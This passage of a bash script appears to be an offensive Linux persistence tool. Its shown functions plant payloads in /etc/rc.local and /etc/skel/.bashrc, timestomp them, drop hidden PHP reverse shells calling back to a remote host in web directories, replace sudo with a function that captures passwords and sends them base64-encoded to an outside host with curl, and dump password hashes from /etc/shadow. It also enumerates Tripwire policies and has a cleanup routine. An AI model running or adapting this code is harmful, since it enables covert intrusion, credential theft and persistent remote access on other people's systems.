"/etc/rc.local , if test -f /etc/rc.local; then touch /etc/rc.local; else touch /etc/rc.local && /etc/rc.local; fi , if test -f /etc/rc.local; then LINES=\$(expr \`cat /etc/rc.local | wc -l\` - 1); cat /etc/rc.local | head -n \$LINES > $TMPRCLOCAL; echo \"$PAYLOAD\" >> $TMPRCLOCAL; echo \"exit 0\" >> $TMPRCLOCAL; mv $TMPRCLOCAL /etc/rc.local; else echo \"#!/bin/sh -e\" > /etc/rc.local; echo $PAYLOAD >> /etc/rc.local; echo \"exit 0\" >> /etc/rc.local; fi; chmod +x /etc/rc.local?"
"/etc/skel/.bashrc , find /etc/skel/.bashrc -writable | grep -q bashrc , echo \"$PAYLOAD 2> /dev/null 1>&2 & sleep .0001\" >> /etc/skel/.bashrc?"
)
IFS="?"
for s in ${DOORS[@]};
do
if $(echo $PAYLOAD | grep -qi "[a-z]")
then
DOOR=$(echo $s | awk -F ' , ' '{print $1}')
EVAL_STATEMENT=$(echo $s | awk -F ' , ' '{print $2}')
HINGE=$(echo $s | awk -F ' , ' '{print $3}')
if $(echo $DOOR | grep -qi "[a-z]")
then
echo "$EVAL_STATEMENT" | $SHELL 2> /dev/null
if [ $? -eq 0 ];
then
if echo $DOOR | grep -qi "[a-z]";
then
if [ $DISABLEBASHRC -eq 1 ] && $(echo $DOOR | grep -qi bashrc);
then
:
else
echo -e "\e[92m[+]\e[0m Door Found: $DOOR"
if [ "$PRINTCOMMANDS" -eq 1 ];
then
echo "[+] Command Used for Installation: $HINGE"
if [ "$TIMESTOMP" -eq 1 ];
then
echo "[+] Command Used for Timestomping: find -type f $DOOR 2> /dev/null | egrep \"$RHOST|$RHOST_DECIMAL\" | xargs touch -r /etc/passwd"
fi
echo
fi
if [ "$DRYRUN" -eq 0 ];
then
echo "$HINGE" | $SHELL 2> /dev/null &> /dev/null
if [ $? -eq 0 ];
then
echo -e "\e[92m[+]\e[0m Persistence Installed: $METHOD using $DOOR"
if [ $TIMESTOMP -eq 1 ];
then
find $DOOR 2> /dev/null | xargs touch -r /etc/passwd
echo -e "\e[92m[+]\e[0m Timestomped Door: $DOOR"
fi
COUNTER=$(expr $COUNTER + 1)
limit_checker $COUNTER
fi
fi
fi
fi
fi
fi
fi
done
echo "-----------------------"
}
webserver_poison_attack() {
unset IFS
if $(grep -qi "www-data" /etc/passwd)
then
if $(find $(grep --color=never "www-data" /etc/passwd | awk -F: '{print $6}') -writable -type d 2> /dev/null | grep -qi "[A-Za-z0-9]")
then
echo -e "\e[92m[+]\e[0m Web Server Poison Attack Available for the Following Directories"
for i in $(find $(grep --color=never "www-data" /etc/passwd | awk -F: '{print $6}') -writable -type d);
do
echo -e "\e[92m[+]\e[0m Directory Found: $i"
if [ $DRYRUN -eq 0 ];
then
IFS="?"
for s in ${METHODS[@]};
do
METHOD=$(echo $s | awk -F ' , ' '{print $1}')
PAYLOAD=$(echo $s | awk -F ' , ' '{print $3}')
if $(echo $METHOD | grep -qi "php");
then
unset IFS
RANDOMPHPFILE=$(echo $(uuidgen 2> /dev/null).php) || RANDOMPHPFILE=$(echo $(grep -oa --color=never [qwertyuiooplkjhgfdsazxcvbnm1234567890] /dev/urandom | head -n 20 | tr -d '\n').php)
if [ "$STEALTHMODE" -eq 1 ];
then
RANDOMPHPFILE=$(echo .$(uuidgen 2> /dev/null).php) || RANDOMPHPFILE=$(echo .$(grep -oa --color=never [qwertyuiooplkjhgfdsazxcvbnm1234567890] /dev/urandom | head -n 20 | tr -d '\n'))
fi
PAYLOAD="<?php exec(\"$SHELL -c '$SHELL -i >& /dev/tcp/$RHOST/$RPORT 0>&1'\"); ?>"
echo $PAYLOAD > $i/$RANDOMPHPFILE &&
echo -e "\e[92m[+]\e[0m Persistence Installed: PHP Reverse Shell $i/$RANDOMPHPFILE" &&
if [ "$TIMESTOMP" -eq 1 ];
then
touch -r /etc/passwd $i/$RANDOMPHPFILE
echo -e "\e[92m[+]\e[0m Timestomped File: $i/$RANDOMPHPFILE"
fi
COUNTER=$(expr $COUNTER + 1) &&
limit_checker $COUNTER
IFS="?"
fi
done
unset IFS
fi
done
echo "-----------------------"
fi
fi
}
sudo_hijack_attack() {
if $(cat /etc/group | grep sudo | grep -qi $(whoami)) && $(which curl | grep -qi curl);
then
if [ "$DRYRUN" -eq 0 ];
then
echo 'function sudo () { #linpersudo
REALSUDO="$(which sudo)" #linpersudo
SUDOPASSWORDFILE="'$SUDOPASSWORDFILE'" #linpersudo
read -s -p "[sudo] password for $USER: " PASSWD #linpersudo
printf "\n"; printf "%s\n" "$USER : $PASSWD" >> $SUDOPASSWORDFILE #linpersudo
sort -uo "$SUDOPASSWORDFILE" "$SUDOPASSWORDFILE" #linpersudo
ENCODED=$(cat "$SUDOPASSWORDFILE" | base64 | tr -d "\n") > /dev/null 2>&1 #linpersudo
curl -k -s "https://'$RHOST'/$ENCODED" > /dev/null 2>&1 #linpersudo
$REALSUDO -S <<< "$PASSWD" -u root bash -c "exit" > /dev/null 2>&1 #linpersudo
$REALSUDO "${@:1}" #linpersudo
} #linpersudo' >> ~/.bashrc &&
echo -e "\e[92m[+]\e[0m Hijacked $(whoami)'s sudo access" &&
echo "[+] Password will be Stored in $SUDOPASSWORDFILE" &&
echo "[+] $SUDOPASSWORDFILE will be exfiltrated to https://$RHOST/ as a base64 encoded GET parameter"
else
echo -e "\e[92m[+]\e[0m Sudo Hijack Attack Possible"
fi
echo "-----------------------"
fi
}
shadow() {
if $(find /etc/shadow -readable | grep -qi shadow)
then
if [ "$DRYRUN" -eq 0 ];
then
echo -e "\e[92m[+]\e[0m Accounts with Passwords from /etc/shadow"
egrep -v "\*|\!" /etc/shadow
else
echo -e "\e[92m[+]\e[0m You Can Read /etc/shadow"
fi
echo "-----------------------"
fi
}
cleanup() {
TMPCLEANBASHRC=$(echo $WRITABLE_DIR/$(uuidgen 2> /dev/null)) || TMPCLEANBASHRC=$(echo $WRITABLE_DIR/$(grep -oa --color=never [qwertyuiooplkjhgfdsazxcvbnm1234567890] /dev/urandom | head -n 20 | tr -d '\n'))
TMPCLEANRCLOCAL=$(echo $WRITABLE_DIR/$(uuidgen 2> /dev/null)) || TMPCLEANRCLOCAL=$(echo $WRITABLE_DIR/$(grep -oa --color=never [qwertyuiooplkjhgfdsazxcvbnm1234567890] /dev/urandom | head -n 20 | tr -d '\n'))
TMPCLEANCRONTAB=$(echo $WRITABLE_DIR/$(uuidgen 2> /dev/null)) || TMPCLEANCRONTAB=$(echo $WRITABLE_DIR/$(grep -oa --color=never [qwertyuiooplkjhgfdsazxcvbnm1234567890] /dev/urandom | head -n 20 | tr -d '\n'))
if $(echo $RHOST | grep -qP "^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$");
then
local a b c d ip=$RHOST
IFS=. read -r a b c d <<< "$ip"
RHOST_DECIMAL=$((a * 256 ** 3 + b * 256 ** 2 + c * 256 + d))
unset IFS
if [ $RHOST_DECIMAL -eq 0 ];
then
RHOST_DECIMAL="0.0.0.0"
fi
fi
if [ "$DRYRUN" -ne 1 ];
then
echo -e "\e[92m[+]\e[0m Removing modifications, this may take a while..."
fi
if $(grep -qi "#linpercrontab" ~/.bashrc);
then
if [ "$DRYRUN" -eq 1 ];
then
echo -e "\e[92m[+]\e[0m Crontab Intercept Found: $HOME/.bashrc"
else
grep -v "#linpercrontab" ~/.bashrc > $TMPCLEANBASHRC &&
cp $TMPCLEANBASHRC ~/.bashrc &&
echo -e "\e[92m[+]\e[0m Removed Crontab Intercept: $HOME/.bashrc"
fi
fi
if $(grep -qi "#linpersudo" ~/.bashrc);
then
if [ "$DRYRUN" -eq 1 ];
then
echo -e "\e[92m[+]\e[0m Sudo Hijack Attack Found: $HOME/.bashrc"
else
grep -v "#linpersudo" ~/.bashrc > $TMPCLEANBASHRC &&
cp $TMPCLEANBASHRC ~/.bashrc &&
echo -e "\e[92m[+]\e[0m Removed Sudo Hijack Attack: $HOME/.bashrc"
fi
fi
if $(egrep -qi "$1|$RHOST_DECIMAL" ~/.bashrc);
then
if [ "$DRYRUN" -eq 1 ];
then
echo -e "\e[92m[+]\e[0m Reverse Shell Found: $HOME/.bashrc"
else
egrep -v "$1|$RHOST_DECIMAL" ~/.bashrc > $TMPCLEANBASHRC &&
cp $TMPCLEANBASHRC ~/.bashrc &&
echo -e "\e[92m[+]\e[0m Removed Reverse Shell: $HOME/.bashrc"
$REMOVALTOOL $TMPCLEANBASHRC
fi
fi
CRONBINARY=$(which crontab)
if $($CRONBINARY -l 2> /dev/null | egrep -qi "$1|$RHOST_DECIMAL");
then
if [ "$DRYRUN" -eq 1 ];
then
echo -e "\e[92m[+]\e[0m Reverse Shell Found: /var/spool/crontab/$(whoami)"
else
$CRONBINARY -l 2> /dev/null | egrep -v "$1|$RHOST_DECIMAL" | grep "[A-Za-z0-9]" 2> /dev/null 1>&2 && $CRONBINARY -l | egrep -v "$1|$RHOST_DECIMAL" 2> /dev/null | grep "[A-Za-z0-9]" 2> /dev/null | $CRONBINARY || $CRONBINARY -r
echo -e "\e[92m[+]\e[0m Removed Reverse Shell: /var/spool/crontab/$(whoami)"
fi
fi
if $(egrep -qi "$1|$RHOST_DECIMAL" /etc/crontab 2> /dev/null);
then
if [ "$DRYRUN" -eq 1 ];
then
echo -e "\e[92m[+]\e[0m Reverse Shell Found: /etc/crontab"
else
egrep -v "$1|$RHOST_DECIMAL" /etc/crontab > $TMPCLEANCRONTAB &&
cp $TMPCLEANCRONTAB /etc/crontab &&
$REMOVALTOOL $TMPCLEANCRONTAB &&
echo -e "\e[92m[+]\e[0m Removed Reverse Shell: /etc/crontab"
fi
fi
for i in $(find $(grep --color=never "www-data" /etc/passwd | awk -F: '{print $6}') /etc/cron.d/ /etc/cron.hourly/ /etc/cron.daily/ /etc/cron.weekly/ /etc/cron.monthly/ -writable -type f 2> /dev/null);
do
egrep -qi "$1|$RHOST_DECIMAL" $i 2> /dev/null
if [[ $? -eq 0 ]];
then
if [ "$DRYRUN" -eq 1 ];
then
echo -e "\e[92m[+]\e[0m Reverse Shell Found: $i"
else
$REMOVALTOOL $i &&
echo -e "\e[92m[+]\e[0m Removed Reverse Shell: $i"
fi
fi
done
for i in $(find /etc/systemd/ -writable -type f 2> /dev/null);
do
egrep -qi "$1|$RHOST_DECIMAL" $i 2> /dev/null
if [[ $? -eq 0 ]];
then
TMP=$(echo $i | sed 's/.*\///g' | tr -d '.' | sed 's/..$//g')
for j in $(find /etc/systemd/ -writable -type f);
do
grep -q $TMP $j 2> /dev/null
if [[ $? -eq 0 ]];
then
if [ "$DRYRUN" -eq 1 ];
then
echo -e "\e[92m[+]\e[0m Reverse Shell Found: $i"
echo -e "\e[92m[+]\e[0m Reverse Shell Stager Found: $j"
else
$REMOVALTOOL $i $j &&
echo -e "\e[92m[+]\e[0m Removed Reverse Shell: $i" &&
echo -e "\e[92m[+]\e[0m Removed Reverse Shell Stager: $j"
fi
fi
done
fi
done
if $(egrep -q "$1|$RHOST_DECIMAL" /etc/rc.local 2> /dev/null);
then
if [ "$DRYRUN" -eq 1 ];
then
echo -e "\e[92m[+]\e[0m Reverse Shell Found: /etc/rc.local"
else
egrep -v "$1|$RHOST_DECIMAL" "/etc/rc.local" > $TMPCLEANRCLOCAL &&
cp $TMPCLEANRCLOCAL "/etc/rc.local" &&
if $(cat /etc/rc.local | wc -l | grep -q "^2$");
then
$REMOVALTOOL "/etc/rc.local"
fi
echo -e "\e[92m[+]\e[0m Removed Reverse Shell: /etc/rc.local"
$REMOVALTOOL $TMPCLEANRCLOCAL
fi
fi
if $(cat /etc/skel/.bashrc 2> /dev/null | egrep -q "$1|$RHOST_DECIMAL");
then
if [ "$DRYRUN" -eq 1 ];
then
echo -e "\e[92m[+]\e[0m Reverse Shell Found: /etc/skel/.bashrc"
else
egrep -v "$1|$RHOST_DECIMAL" /etc/skel/.bashrc > $TMPCLEANBASHRC &&
cp $TMPCLEANBASHRC /etc/skel/.bashrc &&
echo -e "\e[92m[+]\e[0m Removed Reverse Shell: /etc/skel/.bashrc"
fi
fi
}
enum_defenses() {
echo -e "\e[92m[+]\e[0m Enumerating Tripwire Policies"
file /etc/tripwire/* | grep "ASCII" | awk -F: '{print $1}' | xargs cat | grep --color=always -e ^SEC -e systemd -e crontab -e bashrc -e rc\.local -e /etc/skel || echo "[+] None Found"
}
main() {
syntax_checker
find_writable
if [ "$CLEAN" -eq 1 ];
then
cleanup $RHOST
exit 0
fi
if [ "$ENUM_DEF" -eq 1 ];
then
enum_defenses
exit 0
fi
sudo_hijack_attack $SUDOPASSWORDFILE
shadow
if [ "$STEALTHMODE" -eq 1 ];
then
stealth_modifications
fi
set_methods
enum_methods
webserver_poison_attack
remove_writable
exit 0
}
main